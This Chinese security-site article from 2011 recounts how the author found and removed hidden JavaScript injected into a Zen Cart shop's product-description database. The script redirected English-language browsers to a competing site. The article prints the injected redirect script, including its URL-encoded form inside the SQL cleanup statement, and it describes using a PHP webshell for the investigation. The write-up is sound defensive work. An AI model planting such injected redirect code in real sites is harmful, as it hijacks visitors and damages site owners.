首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>网络安全>文章内容
记录一次网站被黑抓马记
来源:vfocus.net 作者:过客 发布时间:2011-01-18  

前言:昨天接到一个朋友的委托,任务是解决网站遇到英文浏览器自动跳转到另一个网站的问题。

背景:现在的网络时代,黑客与商业并存的时代。有些人利用入侵技术来达到利益问题,成为网络中的黑色产业链。有人利用入侵挂马,抓肉鸡。有人利用入侵挂链,做SEO优化。呵呵,五花八门啊。今天碰到的这个问题和SEO优化有关,是利用别人的网站浏览用户传送到指定网站。委托人的网站是外贸英文站,主要对老外出售一些商品。而跳转的网站正是同行。呵呵!有些明白了吧,这就是SEO手段的一种。

事件回放结束,开始入题。

从现象上分析“遇到英文浏览器自动跳转”,很显示是网站代码的问题,排队了域名劫持的可能性。网站采用的是Zen Cart程序,首先声明下哥对这个东西并不熟悉哦!但解析思路是有的,首页看下网站首页有没有可疑的JS代码。很为判断浏览器的代码都是以JS代码来实现的。

打开网站首页从浏览器,查看-源文件。先搜索下跳转到的URL地址的关键字,7louisvuitton.com未发现结果。接下来只能一行行看代码了,严格注意js的代码。从头到尾看了半天仍然未发现可疑的代码。这个看似有些难度了。接着进入后台,利用Zen Cart源码搜索功能搜索下关键字。执行过,文件都查一遍仍然没找到。

这时接过FTP用户密码信息,操刀上了php webshell。利用文件查找功能对网站文件进行全面的关键字搜索,反复查找都没有结果。看来这东西要么是存在数据库中,要么就是换了url地址了。百度下zen cart模板使用,关键的几个部分都手动查找下,仍然没发现结果。

这时又去网站页面的商品页仔细打量了一番,在注释这里<!--bof Product description -->发现了一段进行编码过的js。


 

感觉有些问题,马上拿出url解码器来看。


 


发现两段代码:
  1. <script language="javascript" src="http://count40.51yes.com/click.aspx?id=401446169&logo=6" charset="gb2312"></script> 

这个是流量统计

  1. <script language="JavaScript">   
  2. <!--   
  3. var la=navigator.browserLanguage.toLowerCase();  
  4. if(la=='en-us') document.location = 'http://ii3v.com/b';  
  5. // -->   
  6. </script> 
  7.  

这个就是关键了,判断浏览器版本是en-us 就跳。。。哈哈,很犀利啊。

这里跳转的URL和关键字的那个是同一个网站。

下面发现了代码就好说了,商品应该是模板的问题吧。马上找到模板。
templates\template_default\templates\tpl_document_product_info_display.php


 

内容就一个变量<?php echo stripslashes($products_description); ?>,郁闷了。没玩过Zen Cart。不知道这个变量从哪来的了。找了半天没头绪了,只好去数据库看下了。利用php webshell 备份功能连接进了数据库,看到库里正好有一个products_description的表,马上备份下载之。

本地mysql还原之

相关命令

  1. mysql -uroot -p123456  
  2.  
  3. create database aaa;  
  4.  
  5. use aaa;  
  6.  
  7. source d:\1.sql;  
  8.  

恢复后
果然发现在商品描述的表前面都被插入了这段代码。


 
 利用批理替换,马上恢复了正常。


代码如下:

update products_description set products_description =replace (products_description,'<div style="display:none"><script language="javascript" src=" http://%63%6F%75%6E%74%34%30%2E%35%31%79%65%73%2E%63%6F%6D/click.aspx?id=401446169&logo=6" charset="gb2312"></script><script><!--
document.write(unescape("%3Cscript%20language%3D%22JavaScript%22%3E%20%0D%0A%3C%21--%20%0D%0Avar%20la%3Dnavigator.browserLanguage.toLowerCase%28%29%3B%0D%0Aif%28la%3D%3D%27en-us%27%29%20document.location%20%3D%20%27http%3A//%69%69%33%76%2E%63%6F%6D/b%27%3B%0D%0A//%20--%3E%20%0D%0A%3C/script%3E"));//--></script></div>','')
 

 
 

 

下面的任务就是查找php木马与后门,升级Zen Cart至最新了。

至此任务完成,这可算是比较犀利的SEO攻击法啊。

 

作者:过客



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·一句话木马
·samcrypt.lib简介
·教你轻松查看QQ空间加密后的好友
·web sniffer 在线嗅探/online ht
·SPIKE与Peach Fuzzer相关知识
·asp,php,aspx一句话集合
·Cisco PIX525 配置备忘
·用Iptables+Fedora做ADSL 路由器
·检查 Web 应用安全的几款开源免
·Md5(base64)加密与解密实战
·NT下动态切换进程分析笔记
·风险评估中的渗透测试
  相关文章
·从真实故事说起 读黑客战术社会
·麻烦的终结者
·Web开发框架安全杂谈
·SPIKE与Peach Fuzzer相关知识
·网络渗透测试指导手册
·利用PHP编程防范XSS跨站脚本攻击
·web sniffer 在线嗅探/online ht
·PHP中的密码学算法及其应用2-对
·Content-Type 防范 XSS 绕过
·一句话木马
·asp,php,aspx一句话集合
·常见 Webshell 的检测方法及检测
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved